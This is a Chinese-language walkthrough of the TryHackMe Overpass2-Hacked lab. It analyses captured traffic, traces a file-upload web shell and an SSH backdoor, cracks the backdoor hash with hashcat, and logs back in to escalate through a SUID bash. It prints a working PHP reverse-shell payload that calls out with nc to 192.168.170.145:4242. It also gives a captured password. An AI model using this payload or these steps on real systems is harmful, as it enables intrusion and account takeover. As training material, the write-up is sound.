THM靶机overpass2-hacked流量分析溯源初体验

#流量分析

随便找一个tcp包：

发现其中有命令执行，推测是一个反弹shell，未加密，所以不太可能是msf或者其它c2的shell，只是一个普通的nc shell或者bash shell。

看到tcp之前的最后一个HTTP包：

序列14的包，这是一次上传反弹shell来getshell的攻击，包含关键词/uploads/payload, 判断是一次文件上传getshell，同时输入过滤，包含关键词upload, 找到漏洞uri：

http.request.uri contains "upload"

展开该包，发现payload：

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

继续分析，调查其它可疑行为，首先是输入密码的操作，包括不限于su sudo ssh mysql等：

 看到一个sudo，应该是提权操作，跟踪该tcp流可以看到从头到尾全部操作：

敏感操作密码在su james 处：whenevernoteartinstant

 在提权尝试之后还建立了ssh后门：

 在下面发现对方使用的hash，破解这个hash就可以得到对方的常用(?)密码之一：

##首先找到对方使用的ssh后门的git项目https://github.com/NinjaJc01/ssh-backdoor，查看源码：

可以看到hash算法是crypto/sha512。

从tcp流中可以看到对方没有指定自己的hash，也就是用的源码里的默认hash：

 得到这些信息后，hashcat爆破,这里注意要提前把hash1里的hash调整成hashcat标准格式：

hashcat -m 1710 -a 0 -o cracked.txt hash1 /usr/share/wordlists/rockyou.txt

 这样就可以拿到ssh后门的密码，后面的任务就是黑回去：

首先扫描服务器端口：

 2222就是对方留的后门

现在我们知道密码，知道账号，直接ssh登录即可。

 新版openssh可能会碰到点困难，google一下。

进去之后会发现james的密码已经失效了，ssh的密码和原来的旧密码都没有用，所以这时候需要尝试横向一下。

我们原来有四个其它用户的旧密码：

 会发现所有密码均已经失效，狡猾的hacker修改了所有的密码。不过好心的hacker似乎留了一个提权后门：

看到最后一行的 /home/james/.suid_bash，相当可疑。

 提权成功。

总结：本靶机难度非常简单，不过可以帮助练习者快速建立流量分析和溯源信息搜集的基本印象。

#